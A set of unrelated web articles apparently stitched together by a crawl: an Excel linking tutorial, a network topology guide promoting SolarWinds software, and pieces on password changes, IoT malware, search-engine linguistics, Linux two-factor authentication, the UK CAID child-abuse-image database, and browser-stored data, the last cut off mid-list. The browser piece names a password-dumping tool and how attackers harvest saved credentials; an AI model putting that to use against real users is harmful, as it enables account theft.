“A cell reference refers to a cell or a range of cells on a worksheet and can be used in a formula so that Microsoft Office Excel can find the values or data that you want that formula to calculate,” according to Microsoft.
BC Networks offers Microsoft Support in San Francisco Bay Area, including MS Excel training. This article is based on video produced by the company. Learn tips and tricks on how to link cells and cell ranges in a single workbook or in a separate workbook.
In this tutorial, you can learn:
- Why linking data is useful
- How to link data in the same workbook
- How to link data between workbooks
Why Would You Want to Link Spreadsheet Data?
Creating links, also called external cell references, eliminates manually entering the same information in multiple places. This saves time, reduces errors an improves the reliability of your data.
For example, product prices may be stored in a worksheet called “Master Price List” and other sheets might link to it. A sales manager could use detailed sheets for each salesperson and then create a summary sheet that compares performance and adds up total sales.
How Does Linking Spreadsheet Data Work?
“Some of the most useful and time-saving features in Excel are the options to link data across worksheets…including how to link several worksheets in one workbook,” according to a comprehensive video tutorial from BC Networks.
An Excel link, or external cell reference, dynamically pulls data from one worksheet into the same workbook or a new workbook. It’s written like a formula.
The worksheet that contains the data is called the source worksheet; the external cell reference is written in the destination worksheet which copies the data in the source. For added convenience, if the source data changes, so does the destination worksheet cell when it’s opened.
How Can You Create a Worksheet Link?
Open the destination worksheet and all workbooks that contain source worksheets. Make sure they’re open the same Excel window. There are a few ways to create the link; here’s the easiest:
- Go to the destination worksheet and select the cell that you want to contain the link. Type an equal sign but don’t press enter.
- Now, in the source worksheet, select the cell that contains the data you want to copy. Press enter.
- Excel takes you back to the destination worksheet where are you can now see the desired data.
How Can You Link a Range of Cells?
If you want to link a range of cells, simply select them then click copy. Within the destination sheet, select the cell where the upper-left cell of the chosen range should appear. Right-click and select Paste Link.
The contents of the source cells will now appear in the destination worksheet. Each cell will have its own link back to the source worksheet.
BC Networks: Microsoft Support in San Francisco Bay Area
San Jose-based BC Networks provides managed IT services and Microsoft support in San Francisco Bay Area. Contact us today for more information on how we can transform your business and make your employees more productive.
Experience and strategy are what set us apart from other San Jose, Silicon Valley & South Bay IT companies. We deliver consistently optimal results following our carefully developed and mature set of IT practices and procedures. | <urn:uuid:98d59b61-d153-486e-9603-009d480f1216> | CC-MAIN-2022-40 | https://www.bcnetworks.com/excel-tips/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00754.warc.gz | en | 0.889234 | 747 | 3.125 | 3 |
The configuration, or topology, of a network is key to determining its performance. Network topology is the way a network is arranged, including the physical or logical description of how links and nodes are set up to relate to each other.
There are numerous ways a network can be arranged, all with different pros and cons, and some are more useful in certain circumstances than others. Admins have a range of options when it comes to choosing a network topology, and this decision must account for the size and scale of their business, its goals, and budget. Several tasks go into effective network topology management, including configuration management, visual mapping, and general performance monitoring. The key is to understand your objectives and requirements to create and manage the network topology in the right way for your business.
Following an in-depth network topology definition, this article will look at the main types of network topologies, their benefits and drawbacks, and considerations for determining which one is best for your business. I’ll also discuss the use and benefits of network topology mapping software like SolarWinds® Network Topology Mapper in configuring your network, visualizing the way devices connect, and troubleshooting network issues.
What Is Network Topology?
Network topology refers to how various nodes, devices, and connections on your network are physically or logically arranged in relation to each other. Think of your network as a city, and the topology as the road map. Just as there are many ways to arrange and maintain a city—such as making sure the avenues and boulevards can facilitate passage between the parts of town getting the most traffic—there are several ways to arrange a network. Each has advantages and disadvantages and depending on the needs of your company, certain arrangements can give you a greater degree of connectivity and security.
There are two approaches to network topology: physical and logical. Physical network topology, as the name suggests, refers to the physical connections and interconnections between nodes and the network—the wires, cables, and so forth. Logical network topology is a little more abstract and strategic, referring to the conceptual understanding of how and why the network is arranged the way it is, and how data moves through it.
Why Is Network Topology Important?
The layout of your network is important for several reasons. Above all, it plays an essential role in how and how well your network functions. Choosing the right topology for your company’s operational model can increase performance while making it easier to locate faults, troubleshoot errors, and more effectively allocate resources across the network to ensure optimal network health. A streamlined and properly managed network topology can increase energy and data efficiency, which can in turn help to reduce operational and maintenance costs.
The design and structure of a network are usually shown and manipulated in a software-created network topology diagram. These diagrams are essential for a few reasons, but especially for how they can provide visual representations of both physical and logical layouts, allowing administrators to see the connections between devices when troubleshooting.
The way a network is arranged can make or break network functionality, connectivity, and protection from downtime. The question of, “What is network topology?” can be answered with an explanation of the two categories in the network topology.
- Physical – The physical network topology refers to the actual connections (wires, cables, etc.) of how the network is arranged. Setup, maintenance, and provisioning tasks require insight into the physical network.
- Logical – The logical network topology is a higher-level idea of how the network is set up, including which nodes connect to each other and in which ways, as well as how data is transmitted through the network. Logical network topology includes any virtual and cloud resources.
Effective network management and monitoring require a strong grasp of both the physical and logical topology of a network to ensure your network is efficient and healthy.
What’s the Most Common Type of Network Topology?
Building a local area network (LAN) topology can be make-or-break for your business, as you want to set up a resilient, secure, and easy-to-maintain topology. There are several different types of network topology and all are suitable for different purposes, depending on the overall network size and your objectives.
As with most things, there’s no “right” or one-size-fits-all option. With this in mind, I’ll walk you through the most common network topology definitions to give you a feel for the advantages and disadvantages of each.
What Is Star Topology?
A star topology, the most common network topology, is laid out so every node in the network is directly connected to one central hub via coaxial, twisted-pair, or fiber-optic cable. Acting as a server, this central node manages data transmission—as information sent from any node on the network has to pass through the central one to reach its destination—and functions as a repeater, which helps prevent data loss.
Advantages of Star Topology
Star topologies are common since they allow you to conveniently manage your entire network from a single location. Because each of the nodes is independently connected to the central hub, should one go down, the rest of the network will continue functioning unaffected, making the star topology a stable and secure network layout.
Additionally, devices can be added, removed, and modified without taking the entire network offline.
On the physical side of things, the structure of the star topology uses relatively little cabling to fully connect the network, which allows for both straightforward setup and management over time as the network expands or contracts. The simplicity of the network design makes life easier for administrators, too, because it’s easy to identify where errors or performance issues are occurring.
Disadvantages of Star Topology
On the flipside, if the central hub goes down, the rest of the network can’t function. But if the central hub is properly managed and kept in good health, administrators shouldn’t have too many issues.
The overall bandwidth and performance of the network are also limited by the central node’s configurations and technical specifications, making star topologies expensive to set up and operate.
What Is Bus Topology?
A bus topology orients all the devices on a network along a single cable running in a single direction from one end of the network to the other—which is why it’s sometimes called a “line topology” or “backbone topology.” Data flow on the network also follows the route of the cable, moving in one direction.
Advantages of Bus Topology
Bus topologies are a good, cost-effective choice for smaller networks because the layout is simple, allowing all devices to be connected via a single coaxial or RJ45 cable. If needed, more nodes can be easily added to the network by joining additional cables.
Disadvantages of Bus Topology
However, because bus topologies use a single cable to transmit data, they’re somewhat vulnerable. If the cable experiences a failure, the whole network goes down, which can be time-consuming and expensive to restore, which can be less of an issue with smaller networks.
Bus topologies are best suited for small networks because there’s only so much bandwidth, and every additional node will slow transmission speeds.
Furthermore, data is “half-duplex,” which means it can’t be sent in two opposite directions at the same time, so this layout is not the ideal choice for networks with huge amounts of traffic.
What Is Ring Topology? Single vs. Dual
Ring topology is where nodes are arranged in a circle (or ring). The data can travel through the ring network in either one direction or both directions, with each device having exactly two neighbors.
Pros of Ring Topology
Since each device is only connected to the ones on either side, when data is transmitted, the packets also travel along the circle, moving through each of the intermediate nodes until they arrive at their destination. If a large network is arranged in a ring topology, repeaters can be used to ensure packets arrive correctly and without data loss.
Only one station on the network is permitted to send data at a time, which greatly reduces the risk of packet collisions, making ring topologies efficient at transmitting data without errors.
By and large, ring topologies are cost-effective and inexpensive to install, and the intricate point-to-point connectivity of the nodes makes it relatively easy to identify issues or misconfigurations on the network.
Cons of Ring Topology
Even though it’s popular, a ring topology is still vulnerable to failure without proper network management. Since the flow of data transmission moves unidirectionally between nodes along each ring, if one node goes down, it can take the entire network with it. That’s why it’s imperative for each of the nodes to be monitored and kept in good health. Nevertheless, even if you’re vigilant and attentive to node performance, your network can still be taken down by a transmission line failure.
The question of scalability should also be taken into consideration. In a ring topology, all the devices on the network share bandwidth, so the addition of more devices can contribute to overall communication delays. Network administrators need to be mindful of the devices added to the topology to avoid overburdening the network’s resources and capacity.
Additionally, the entire network must be taken offline to reconfigure, add, or remove nodes. And while that’s not the end of the world, scheduling downtime for the network can be inconvenient and costly.
What Is Dual-Ring Topology?
A network with ring topology is half-duplex, meaning data can only move in one direction at a time. Ring topologies can be made full-duplex by adding a second connection between network nodes, creating a dual ring topology.
Advantages of Dual-Ring Topology
The primary advantage of dual ring topology is its efficiency: because each node has two connections on either side, information can be sent both clockwise and counterclockwise along the network. The secondary ring included in a dual-ring topology setup can act as a redundant layer and backup, which helps solve for many of the disadvantages of traditional ring topology. Dual ring topologies offer a little extra security, too: if one ring fails within a node, the other ring is still able to send data.
What Is Tree Topology?
The tree topology structure gets its name from how the central node functions as a sort of trunk for the network, with nodes extending outward in a branch-like fashion. However, where each node in a star topology is directly connected to the central hub, a tree topology has a parent-child hierarchy to how the nodes are connected. Those connected to the central hub are connected linearly to other nodes, so two connected nodes only share one mutual connection. Because the tree topology structure is both extremely flexible and scalable, it’s often used for wide area networks to support many spread-out devices.
Pros of Tree Topology
Combining elements of the star and bus topologies allows for the easy addition of nodes and network expansion. Troubleshooting errors on the network is also a straightforward process, as each of the branches can be individually assessed for performance issues.
Cons of Tree Topology
As with the star topology, the entire network depends on the health of the root node in a tree topology structure. Should the central hub fail, the various node branches will become disconnected, though connectivity within—but not between—branch systems will remain.
Because of the hierarchical complexity and linear structure of the network layout, adding more nodes to a tree topology can quickly make proper management an unwieldy, not to mention costly, experience. Tree topologies are expensive because of the sheer amount of cabling required to connect each device to the next within the hierarchical layout.
What Is Mesh Topology?
A mesh topology is an intricate and elaborate structure of point-to-point connections where the nodes are interconnected. Mesh networks can be full or partial mesh. Partial mesh topologies are mostly interconnected, with a few nodes with only two or three connections, while full-mesh topologies are—surprise!—fully interconnected.
The web-like structure of mesh topologies offers two different methods of data transmission: routing and flooding. When data is routed, the nodes use logic to determine the shortest distance from the source to destination, and when data is flooded, the information is sent to all nodes within the network without the need for routing logic.
Advantages of Mesh Topology
Mesh topologies are reliable and stable, and the complex degree of interconnectivity between nodes makes the network resistant to failure. For instance, no single device going down can bring the network offline.
Disadvantages of Mesh Topology
Mesh topologies are incredibly labor-intensive. Each interconnection between nodes requires a cable and configuration once deployed, so it can also be time-consuming to set up. As with other topology structures, the cost of cabling adds up fast, and to say mesh networks require a lot of cabling is an understatement.
What Is Hybrid Topology?
Hybrid topologies combine two or more different topology structures—the tree topology is a good example, integrating the bus and star layouts. Hybrid structures are most commonly found in larger companies where individual departments have personalized network topologies adapted to suit their needs and network usage.
Advantages of Hybrid Topology
The main advantage of hybrid structures is the degree of flexibility they provide, as there are few limitations on the network structure itself that a hybrid setup can’t accommodate.
Disadvantages of Hybrid Topology
However, each type of network topology comes with its own disadvantages, and as a network grows in complexity, so too does the experience and know-how required on the part of the admins to keep everything functioning optimally. There’s also the monetary cost to consider when creating a hybrid network topology.
Which Topology Is Best for Your Network?
No network topology is perfect, or even inherently better than the others, so determining the right structure for your business will depend on the needs and size of your network. Here are the key elements to consider:
- Length of cable needed
- Cable type
Generally, the more cable involved in network topology, the more work it’ll require to set up. The bus and star topologies are on the simpler side of things, both being fairly lightweight, while mesh networks are much more cable- and labor-intensive.
The second point to consider is the type of cable you’ll install. Coaxial and twisted-pair cables both use insulated copper or copper-based wiring, while fiber-optic cables are made from thin and pliable plastic or glass tubes. Twisted-pair cables are cost-effective but have less bandwidth than coaxial cables. Fiber-optic cables are high performing and can transmit data far faster than twisted-pair or coaxial cables, but they also tend to be far more expensive to install, because they require additional components like optical receivers. So, as with your choice of network topology, the wiring you select depends on the needs of your network, including which applications you’ll be running, the transmission distance, and desired performance.
As I’ve mentioned, the installation cost is important to account for, as the more complex network topologies will require more time and funding to set up. This can be compounded if you’re combining different elements, such as connecting a more complex network structure via more expensive cables (though using fiber-optic cables in a mesh network is overdoing it, if you ask me, because of how interconnected the topology is). Determining the right topology for your needs, then, is a matter of striking the right balance between installation and operating costs and the level of performance you require from the network.
The last element to consider is scalability. If you anticipate your company and network expanding—or if you’d like it to be able to—it’ll save you time and hassle down the line to use an easily modifiable network topology. Star topologies are so common because they allow you to add, remove, and alter nodes with minimal disruption to the rest of the network. Ring networks, on the other hand, have to be taken entirely offline for any changes to be made to any of the nodes.
How to Map Network Topology
When you’re starting to design a network, topology diagrams come in handy. They allow you to see how the information will move across the network, which, in turn, allows you to predict potential choke points. Visual representation makes it easier to create a streamlined and efficient network design, while also acting as a good reference point if you find yourself needing to troubleshoot errors.
A topology diagram is also essential for having a comprehensive understanding of your network’s functionality. In addition to assisting with the troubleshooting process, the bird’s-eye view provided by a topology diagram can help you visually identify the pieces of the infrastructure your network is lacking, or which nodes need monitoring, upgrading, or replacing.
The good news is you don’t have to do it manually: you can easily create a map of your network topology with tools.
What Tools Help Manage and Monitor Networks?
There are a few network topology mapping products on the market. One of the more common ones is Microsoft Visio, which lets you “draw” your network by adding different nodes and devices to a canvas-like interface. While this can work for smaller networks, drawing each additional node quickly becomes unwieldy if you’re working with a multitude of devices and topologies spread across an entire company. Other options, like Lucidchart and LibreOffice Draw, are either free or offer free trials, and while they’re viable options, especially if the cost is a concern, they don’t come with a full set of premium network mapping tools to make managing a network easier and less time-consuming.
Due to variations in network topology and the different ways networks can behave—including their unique security issues, pressure points, and management challenges—it’s often useful to automate configuration and management tasks using network software.
First, consider using a network configuration management tool. This kind of tool can help you configure your network correctly and automate repetitive tasks to take the pressure off the network administrator. As your organization or network grows, the network topology may become more layered or more complex, and it can become harder to deploy configurations across the entire network with certainty. However, with configuration management tools, the complicated network topology is no issue: tools can usually auto-detect each node on the network, allowing you to deploy standard configurations that may be required for compliance reasons, or flag any configurations outside what is expected.
Network configuration management tools can also highlight vulnerabilities, so you can correct these issues and keep your network more secure. Finally, these kinds of tools should also display the lifecycle of the devices on your network, alerting you to devices coming to their end-of-service or end-of-life points, so you can replace them before problems begin to arise.
Network Performance Troubleshooting
You should use network management software to track overall performance. A performance manager can keep track of network issues, outages, and performance issues. A performance management tool will also have the functionality to set network performance baselines and establish a clear picture of how your network typically behaves when healthy. Then, by setting alerts when your network performs unexpectedly or outside of these baselines, you can quickly track, pinpoint, and troubleshoot issues.
With complex network topologies, it may be hard to figure out exactly which part of the network is having issues. Some performance managers will create a visual display of your network topology, so you can see the entire network in a one-map overview. This can show you how your network is laid out, bring your attention to changes in the topology, and flag where problems are arising. To get started understanding your network topology, you can try a tool like Network Topology Mapper free for 14 days. This tool automatically discovers and generates detailed topology maps of your network and can create multiple map types without having to rescan your network every time.
That’s one reason I really like SolarWinds Network Topology Mapper (NTM). No matter the size of your network, it can not only automatically discover all the devices and create a diagram of your network topology for you, but also populate the map with industry-specific icons for easy visual differentiation. In addition to the auto-discovery feature, the software offers an intuitive network wizard so you can drag and drop nodes and node groups (which you can also customize). Visualizing the various connections between nodes in a single map or diagram can be cumbersome, especially if you’re working with an expansive wide area network, but the interface in NTM lets you sort through different layers of connections, depending on the level you’re trying to inspect.
You can configure NTM to periodically rescan your network to keep your diagrams up to date. It integrates easily with other programs, and it offers a robust reporting system so you can track metrics, from device inventory to network performance, all while helping keep you PCI compliant.
Topology Mapping for Managed Services Providers
Topology mapping isn’t just important for managing a single network. It’s also a key aspect of managed services providers’ (MSPs’) essential duties—for hundreds or even thousands of different customers across multiple networks.
Due to the specific needs of MSPs, it often isn’t enough to use the same tool you might use for your personal or company network. It’s worth noting that another SolarWinds MSP (currently N-able) product, N-central®, has a specialized tool for this use case.
The N-central network topology mapping solution enables you to perform in-depth assessments of the networks you manage. You can perform on-demand and scheduled scans, as well as get access to detailed data represented in a clear, visual way.
What to Know About Network Topology Today
The best advice I can give regarding network topology is that you should be deeply familiar with the needs and usage requirements of your network. The total number of nodes on the network is one of the primary considerations to account for, as this will dictate whether it’s feasible to use a simpler topology, or whether you’ll have to make the investment in a more complicated network structure.
As I mentioned earlier, no one topology is “best.” Each offers its own set of perks and drawbacks, depending on the network environment you’re working with or attempting to set up. For this reason, I would avoid jumping to immediate conclusions about any of the network topologies based solely on the descriptions here. Before deciding, try using a network topology mapping tool to sketch the layout you’re thinking about using. Network Topology Mapper, my personal favorite, lets you plot the entire structure of your network in a way that’s both easy to use and easy to parse, and it offers a 14-day free trial. | <urn:uuid:e714230d-6567-4234-a360-e29a68544677> | CC-MAIN-2022-40 | https://www.dnsstuff.com/what-is-network-topology | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00754.warc.gz | en | 0.923674 | 4,911 | 3.359375 | 3 |
If you are in charge of network security, one thing you may want to consider as far as laying down the law in safeguarding your network is the regular change of user passwords to avoid potential hackers and cracks based on how their passwords can be easily guessed.
For some users, it is easy to figure out their passwords. The normal passwords that people use include:
3. Car Plate Numbers
4. Mobile Phone Numbers
5. Adding 123 to their names, or
6. Using “PASSWORD” as their password
Now there will be a lot of potential combinations depending on the length of the password. That is why the longer passwords (8 alphanumeric characters) are encouraged for users who access the network.
But while the probabilities of guessing or cracking passwords offer a lot possibilities, employing a regular maintenance as far as changing them is indeed something ideal to combat these hackers or malicious people from gaining access to the network and the programs in use.
Once cannot avoid the fact that some people’s curiosity and call for fame are the main reasons for wanting to be a hacker or code cracker. It is evident in people who are looking to try out their skill. They don’t think of the outcome which can cause a lot of problems.
So one good tip to avoid being hacked is to think like one. Once you do, think of security policies that can make it hard for you to breach a system. That is the best way to stay efficient in your line of duty in any organization. | <urn:uuid:db174a95-fa7a-4f64-a3b0-ccd0f859d3f7> | CC-MAIN-2022-40 | https://www.it-security-blog.com/it-security-basics/scheduling-change-of-passwords/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00754.warc.gz | en | 0.957371 | 322 | 2.71875 | 3 |
IoT has quickly changed how we think of the Internet. Those who grew up with the Internet might still think of browsers on client systems like laptops and desktops pulling down websites hosted on servers. But today, Internet usage has evolved considerably from that point. We’re watching movies on the streaming app built into our televisions. Voice-enabled home assistants play music and pull up stock quotes on demand. Vast arrays of solar panels are installed at industrial-scale with all kinds of instrumentation built-in to allow for operations and maintenance with minimal human intervention. The benefits of this revolution are seen across the economy, fueled by new, innovative use cases with emerging and cheap distributed manufacturing driving costs down.
Desktop computing followed a similar path some decades ago, with successive generations of processors and cheaper memory enabling gains across broad swathes of society. But relative to IoT, it followed a measured pace. Even as the people producing the hardware and the applications were making steady progress, there was another set who recognized that this provided a parallel opportunity – for them to use this technology to inflict harm on others while enriching themselves. This has led to the many years of network infiltrations, data breaches, and destructive attacks that we’re now hearing about non-stop. For the most part, this has happened in environments based on traditional computing devices like servers and laptops.
As we enter the IoT era, we have to contemplate how the widespread presence of new kinds of devices that include some form of computing and network connectivity might impact the threat landscape.
Mirai, a popular malware family responsible for numerous high-profile DDoS attacks since 2016, has been ported to at least 17 separate IoT architectures. This means that once an adversary has access to an IoT device, odds are there’s already malware ready to be installed.
And then gaining such access keeps getting easier. Many IoT devices run with known vulnerabilities, making them easy to compromise as long as they are reachable on the Internet. The report cites the ECHOBOT family that carries 71 separate exploits for a wide array of devices.
Even if these devices ship without known vulnerabilities in the first place, not many have a software update mechanism of any sort, so they’re almost destined to be vulnerable at some point as the underlying software ages.
This is true globally, and adversaries take advantage of common credentials that ship on devices in specific regions.
Will IoT ever see a moment where it takes a big leap forward in terms of security? Think about when Windows XP Service Pack 3 arrived and provided a huge step forward over previous generations of software that just wasn’t ready for the Internet. Can there be such a big-leap moment for IoT?
For many reasons, this seems like a long shot. The IoT ecosystem is vast, and there are many separate entities responsible for parts of the process, from the time a device is conceived to when it gets installed on a network. One huge problem is that end-users bear the brunt of the insecurity baked into the ecosystem with few consequences for other entities in the chain.
And it’s quite the brunt end users. There have been multiple times in recent years when attacks have occurred that struck at the core of the Internet’s stability. IoT is a jump point for many intrusion campaigns. And the reports of large-scale vulnerabilities keep coming. In the past month, the Trek TCP/IP stack has had a set of 19 separate vulnerabilities reported, with little chance that devices involving the software will ever get updated.
What should we do to fix this? Unfortunately, there are no easy answers.
Standards will have to be created and enforced around the basic design of such devices. Secure access, updates, and obsolescence have to be factored in from the beginning. Consumers will need education on topics, such as the safe deployment and use of their devices. Service providers will need to run containment operations when large attacks break out. Governments have to hold all these entities accountable. Every one of these entities will need to play their part if we are to get anywhere.
As a society, we have to recognize the role of the intelligent adversary, who will adapt to these changes as they are introduced. In many instances, even as we progress in the security of devices we have deployed, the adversary may also make significant gains in their ability to exploit vulnerable devices to their ends.
As the IoT revolution brings changes to society, it is introducing new classes of risk. It’s upon us to make sure these risks are understood and mitigated if we are to reap the full benefits of the revolution. | <urn:uuid:b130b00b-6ebb-4a03-a8fb-5b701d880e31> | CC-MAIN-2022-40 | https://www.cpomagazine.com/cyber-security/security-in-iot-why-it-matters/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00754.warc.gz | en | 0.953591 | 940 | 2.828125 | 3 |
Open topic with navigation
After IDOL Server has processed the tokens to remove any that you do not want to index, it indexes the remaining tokens. During this process, it modifies the tokens to make it easier to return the correct documents. This involves the following processes:
Main Topic: Stemming
In many languages, a related set of words have a common root. For example, help, helping, helpful and helped, all stem from the common root help. You can reduce words to their common root without losing meaning.
The IDOL stemming algorithm reduces all words to their stem, and indexes the stem. This process allows you to search for a word, and return documents with related concepts that do not specifically include that word.
In some languages, there is more than one way to represent a character. For example:
the Roman alphabet has uppercase and lowercase forms of all letters.
the Japanese katakana script can have full width or half width characters.
the Chinese language has two scripts, usually known as Chinese Traditional and Chinese Simplified.
IDOL Server uses canonicalization to ensure that it treats all character forms equally. It automatically converts to an internationally recognized canonical form. Retrieval then matches all versions of a character.
Character normalization is controlled by the same configuration settings as Transliteration.
Transliteration is like Character Normalization in that it aims to map sets of characters to a standard form so that a search for different forms match documents containing any of those forms. An important example is the removal of accents from letters so that a search for cafe matches documents containing café, and the reverse. Similarly, the German letter ß is transliterated to ss.
Transliteration schemes differ by language. For example in German, the letter ö transliterates to oe, whereas in Swedish it transliterates to o. Several languages that use non-Roman scripts can also be transliterated to Roman. For example in Russian, IDOL transliterates Владимир to Vladimir. For details of the transliteration schemes used, see Transliteration Tables.
When you have multiple languages in your server, Micro Focus recommends setting
True. See Cross-Lingual Search.
Transliteration affects only the characters used to represent a word. IDOL Server does not translate terms from one language to another.
Turn Transliteration Off
Several languages have unusual linguistic behavior, such that even if you set
False for that language, some characters are still transliterated. To prevent all transliteration, set:
and then set
False in the individual language sections. | <urn:uuid:d52680da-c77b-4a64-b35a-de25a84b6405> | CC-MAIN-2022-40 | https://www.microfocus.com/documentation/idol/IDOL_11_6/IDOLServer/Guides/html/English/expert/Content/IDOLExpert/Languages/Linguistic_Adjustments.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00754.warc.gz | en | 0.873728 | 578 | 2.609375 | 3 |
If you’re running any form of business, there’s a likely chance that you’re using a flavor of the Linux operating system in one way or another. Linux runs on millions of servers, personal computers and IoT devices, and for the most part, these devices are configured to be accessed and administered remotely. In organizations, Linux servers are tasked with running critical functions and storing sensitive information, which means protecting them from unauthorized access is of paramount importance.
But in most cases, devices running the Linux operating system are protected with nothing more than a username and password. And as it’s becoming increasingly evident, in the age of low-cost supercomputing and ubiquitous connectivity, passwords aren’t enough to protect your computer and devices from unwanted access.
With the right tools, a little patience, and an internet connection, hackers will be able to break into your organization’s Linux machines either by running brute-force and dictionary attacks or by staging phishing scams and stealing your password. And from there, anything can happen.
One of the best ways to prevent uninvited parties from accessing your Linux machines is to enable two-factor authentication (2FA). 2FA adds a layer of security to your Linux by requiring users to present an additional token aside from passwords when trying to login. This will prevent attackers from accessing a machine by stealing or cracking a password.
What are the 2FA options for Linux?
Some of the more popular Two Factor Authentication (2FA) mechanisms are physical keys and one-time passwords (OTP) sent via a phone number or a mobile app. Linux currently supports the Google Authenticator, a mobile application that provides you with OTPs during the login process.
When activating support for the Google Authenticator app on Linux, users are given a secret code that they use to link their phone to their account. Afterwards, when logging in or entering a sudo command, the user will be prompted for their password and a one-time password that appears on the associated phone. OTPs expire after a certain amount of time passes and after they’ve been used.
This 2FA method helps improve user account security on Linux user accounts and makes it considerably harder for cybercriminals to gain unwanted access to a Linux machine. However, it has some distinct drawbacks. First, it requires users to enter two passwords, which most users find annoying. The process can also be tedious when you want quick access to your account. Second, the 2FA mechanism relies on a single channel to generate its OTP, which makes it prone to hacks. Should the passcode be intercepted or cloned, or if the secret code is discovered and installed on a second phone, a malicious user will be able to access the Linux account.
Secret Double Octopus two-factor authentication for Linux
In contrast to traditional OTP-based solutions, Octopus authenticator option is both frictionless and more secure. The Secret Double Octopus solution provides users with a mobile app that gives push notifications for login attempts.
When Secret Double Octopus is activated on a Linux account, all the user needs to do is accept or reject the request with a tap on the associated mobile device. There’s no need to type a second password on the terminal.
Moreover, Secret Double Octopus uses a multichannel security mechanism to increase the security of the two-factor authentication. Requests codes are generated based on several different channels and sent to the phone, making them much harder to intercept or reproduce. This makes cloning and man-in-the-middle attacks virtually impossible. | <urn:uuid:b77378e9-93b1-44ba-96d1-03dad77d0dc2> | CC-MAIN-2022-40 | https://doubleoctopus.com/blog/access-management/blog-two-factor-authentication-linux-machine/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00754.warc.gz | en | 0.918351 | 735 | 2.78125 | 3 |
The Child Abuse Image Database (CAID) is the United Kingdom’s national system used by law enforcement to help fight the growing problem of Child Sexual Abuse Material (CSAM). The system helps police detect, flag and analyse illegal digital media images.
In 2012 the UK’s Operation Yewtree commenced. The operation started as an investigation by the Metropolitan Police Service into sexual abuse allegations, primarily on the abuse of children. It swiftly became a full criminal investigation that led to what is called the “Yewtree effect”, which is credited with an increase in the number of reported sex crimes in the UK. Between that time and 2017 in the UK there were nearly 70,000 child sexual abuse offences. This number, sadly, is up 24% from prior years.
Enter CAID, the Child Abuse Image Database for UK Law Enforcement. CAID is a secure database that consists of illegal images and videos of child exploitation used by UK Law Enforcement. This database is used to help identify both victims and perpetrators of child exploitation.
Technologically savvy, CAID has the tools for facial, object, and relationship mapping. Through the use of CAID, UK Law Enforcement works collaboratively and is able to streamline forensic reports.
The increase in child sexual offences is unfortunately a sign of the times. Technology is making it easier for abusers, not harder. According to CAID, the Internet makes it easier for abusers to connect with their victims, promotes a sense of anonymity, makes it easier for perpetrators to access and share images and video of abuse, and increases the possibility of sharing images being an international crime.
In the fight against such abuses, CAID is a necessary tool. It works by bringing together all of the images that both the police and the National Crime Agency encounter, and uses their unique identifiers (hashes) and metadata to improve investigations. Digital forensic tools like ADF software collect and analyze hash data such as that CAID provides to create readily made reports for prosecutors to assist in child exploitation cases.
CAID was created in conjunction with the police, industry partners, and alongside British Small and Medium Sized Enterprises (SMEs) in 2014. Since then, CAID has helped streamline investigations and prosecution of offenders. CAID hashes are used in forensic triage for early assessment to help police prioritize which of the suspect’s devices require further analysis.
ADF Software works internationally with both Project VIC and CAID hashes to triage on-site, speeding investigations and helping prosecutors get perpetrators off the streets as soon as possible. | <urn:uuid:85ec6ac3-b8c7-470d-8aeb-ddc8f3356ee7> | CC-MAIN-2022-40 | https://www.adfsolutions.com/news/what-is-caid-uk | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00754.warc.gz | en | 0.944747 | 523 | 2.578125 | 3 |
Everybody knows by now that websites collect information about users’ location, visited pages, and other data that can help them improve or monetize the experience.
But just a small minority of Internet users realizes that browsers also collect/store information that can help attackers compile a “Web dossier” to be used for future attacks.
“An attacker could compile a list of applications you commonly log into from your URL history, including work applications and personal finance sites. Criminals can learn who in a company has access to the financial or payroll application, for example, and compile a list of usernames to use to break in. Knowing what applications are in use at a company can help an attacker craft more convincing phishing emails to try and trick users into exposing their passwords, which the attacker could then harvest,” explains Ryan Benson, a threat researcher at Exabeam.
By accessing users’ URL history, an attacker can learn about their personal interests, and use that information to guess their passwords or blackmail them (if the interest is controversial or illegal). Also, usernames and passwords saved in the browser’s password manager can be extracted and used to compromise a wide variety of accounts.
What kind of information does your browser store?
Exabeam’s researchers have performed two tests:
- One with Firefox and OpenWPM, a privacy measurement framework built on Firefox. They visited the 1000 most popular sites on the Internet without logging in, just navigating to three links on each of the websites
- A second on with Chrome. They visited a subset of popular sites (Google Search, Drive, and Mail; YouTube; Facebook; Reddit; Yahoo; Amazon; Twitter; Microsoft’s Outlook and OneDrive; Instagram; Netflix; LinkedIn; Apple; Whatsapp; Paypal; Github; Dropbox; the IRS site) and created accounts, logged in, and performed a relevant action.
In the first test, they found that 56 websites stored some level of geolocation information (via cookies) about the user on their local system, and 57 recorded a user’s IP address.
In the second test, they found that much potentially sensitive information is stored by popular services into the browser: account usernames, associated email addresses, search terms, titles of viewed emails and documents, downloaded files, viewed products, names, physical addresses, and more. And, if the in-browser password manager is on, sensitive credentials are stored and can be accessed by crooks that manage to compromise your computer.
“Creating malware to harvest information stored in a browser is quite straightforward, and variants have been around for years, including the Cerber, Kriptovor, and CryptXXX ransomware families,” Benson noted.
“The free NirSoft tool WebBrowserPassView dumps saved passwords from Internet Explorer, Mozilla Firefox, Google Chrome, Safari, and Opera. While ostensibly designed to help users recover their own passwords, it can be put to nefarious use.”
Collecting this data is especially easy to do on shared computers. “If a machine is unlocked, extracting browser data for analysis could be done in seconds with the insertion of a USB drive running specialized software or click of a web link to insert malware,” he says.
Once collected, all this data can be used to map a user’s work hours, habits, interests, locations, online use and accounts, the type of devices he or she uses, and so on.
Preventing data collection
All this information is collected via things like browsing history and bookmarks, HTTP and HTML5 cookies, saved login info (via in-browser password managers, and via the autofill option.
For those users who would prefer browsers not to store this information, there are many options, but each has some cons.
